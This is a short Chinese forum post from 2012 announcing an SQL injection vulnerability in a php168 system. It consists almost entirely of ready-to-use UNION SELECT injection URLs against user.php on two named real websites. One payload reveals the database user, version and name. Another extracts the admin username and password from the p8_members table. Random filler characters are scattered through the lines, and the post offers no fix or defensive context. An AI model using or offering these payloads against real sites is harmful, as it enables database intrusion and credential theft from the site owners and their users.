找回密码
 立即注册
查看: 3436|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--' {  I: Z7 D" i8 w9 K3 P
                                                         7 p7 S4 x* v1 `
                                       
! a/ M, L1 u+ [+ N6 x
5 E0 i+ k7 Q" u4 J% X. c, U
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--' ]; F1 B1 Y5 d3 C! E
                                                     + F  V- h8 Z  a" u4 z5 B& K6 _: \
                                                                   $ q& [; ~) G; Q4 r) |- r4 Z2 H
                                                        2 t6 v2 ~' C/ G5 d( C  v2 P5 w
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--* ^! a/ w: g+ o) _2 U

/ @3 I- E1 T# d
* I) d; m3 J* z7 g) B
, M6 l( |! ^$ l" Q( Y9 O                                                            % i. M, }$ r! J* x
  r& u! |- G. \) J8 E$ P$ d& T
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
9 O+ s* E6 P# p5 Q# C$ L3 H( S2 ~" [+ Q. d, s( E! [1 x' {
6 I3 O9 B7 T0 Y3 @& h

8 d& ]( k% q& ~$ \                                                                    ! j7 Z' L2 c0 N$ r" S

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表